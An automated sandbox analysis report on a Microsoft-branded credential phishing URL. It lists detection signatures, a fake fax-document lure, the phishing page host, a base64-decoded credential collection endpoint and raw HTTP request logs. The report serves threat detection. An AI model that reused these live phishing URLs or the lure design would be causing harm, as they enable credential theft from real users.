Edit tour

Windows Analysis Report
https://znixulyp.com/vGgw6o

Overview

General Information

Sample URL:	https://znixulyp.com/vGgw6o
Analysis ID:	1428296
Infos:

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Yara detected HtmlPhish29

Phishing site detected (based on image similarity)

Phishing site or detected (based on various text indicators)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML body with high number of embedded images detected

HTML page contains hidden URLs or javascript code

HTML title does not match URL

Invalid 'forgot password' link found

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2544,i,8162842687041464593,4945717451503963078,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://znixulyp.com/vGgw6o" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
1.11.pages.csv	JoeSecurity_HtmlPhish_29	Yara detected HtmlPhish_29	Joe Security
1.1.pages.csv	JoeSecurity_HtmlPhish_29	Yara detected HtmlPhish_29	Joe Security
2.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Phishing site detected (based on favicon image match)

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish10

Source: Yara match

File source: 2.4.pages.csv, type: HTML

Yara detected HtmlPhish29

Source: Yara match	File source: 1.11.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

Phishing site detected (based on image similarity)

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site or detected (based on various text indicators)

Source: Chrome DOM: 1.11

OCR Text: Doc Home Book Now x Cookie Policy This website uses cookies. You can find more information on the types of cookies Access incoming fax document used as well as enable individual cookies Fax ID: 01721232534562 in their respective categories. You can Types: PDF Reference: Scanned Document Read more Pages: 3 Date: Thursday, April 13, 2024 Imprint Privacy Policy O Strictly necessary Click to Review Document Acxept all Reject all Accept only selected JIMDO BUILT WITH

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

HTTP Parser: Number of links: 0

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

HTTP Parser: Total embedded image size: 31111

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

HTTP Parser: Base64 decoded: https://grupoej.com/awazwwazq/host%5b24.0%5d/dd49311.php

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

HTTP Parser: Title: Sign in to Best Productivity Provider! does not match URL

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

HTTP Parser: Invalid link: Forgot my password

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

HTTP Parser: <input type="password" .../> found

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

HTTP Parser: No favicon

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

HTTP Parser: No <meta name="author".. found

Source: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.44.104.130:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.44.104.130:443 -> 192.168.2.4:49762 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.104.130
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /vGgw6o HTTP/1.1Host: znixulyp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /renderer/static/d330293187a93ee79023.css HTTP/1.1Host: jimdo-dolphin-static-assets-prod.freetls.fastly.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://doc-36.jimdosite.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /renderer/static/b98099b58f789b786e66.js HTTP/1.1Host: jimdo-dolphin-static-assets-prod.freetls.fastly.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://doc-36.jimdosite.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /image/454238981/23f5ed5a-6c3b-4b7b-a128-0fd6b1efd2a9.png?quality=80,90&auto=webp&disable=upscale&width=320&height=320 HTTP/1.1Host: jimdo-storage.freetls.fastly.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://doc-36.jimdosite.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /renderer/static/default-website-favicon.1a874ea70dbf3a4b0e0e..png HTTP/1.1Host: jimdo-dolphin-static-assets-prod.freetls.fastly.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://doc-36.jimdosite.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /image/454238981/23f5ed5a-6c3b-4b7b-a128-0fd6b1efd2a9.png?quality=80,90&auto=webp&disable=upscale&width=320&height=320 HTTP/1.1Host: jimdo-storage.freetls.fastly.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /renderer/static/default-website-favicon.1a874ea70dbf3a4b0e0e..png HTTP/1.1Host: jimdo-dolphin-static-assets-prod.freetls.fastly.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /index.html HTTP/1.1Host: pub-06c7664497d24b6cb36a093c4426dcca.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /awazwwazq/host%5b24.0%5d/admin/js/sc.php?r=ZW0sZW1haWwsYWRk HTTP/1.1Host: grupoej.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/54ea73d52131/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-06c7664497d24b6cb36a093c4426dcca.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /awazwwazq/host%5b24.0%5d/dd49311.php HTTP/1.1Host: grupoej.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ui/loader.js HTTP/1.1Host: web.cmp.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ui/v/3.12.1/cmp.cd839b23.js HTTP/1.1Host: web.cmp.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ui/v/3.12.1/BrowserSdk.lib.7fd92bef.js HTTP/1.1Host: web.cmp.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /latest/core/k1JwB2Dk_ HTTP/1.1Host: v1.api.service.cmp.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.jimdo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /session/1px.png?settingsId=k1JwB2Dk_ HTTP/1.1Host: app.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdcs/v/1.0.0/index.html HTTP/1.1Host: web.cmp.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /latest/core/k1JwB2Dk_ HTTP/1.1Host: v1.api.service.cmp.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /latest/1/cmp/en/GDPR/k1JwB2Dk_/263.83.372/263.83.372?isOutsideEu=true HTTP/1.1Host: v1.api.service.cmp.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.jimdo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webviewAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
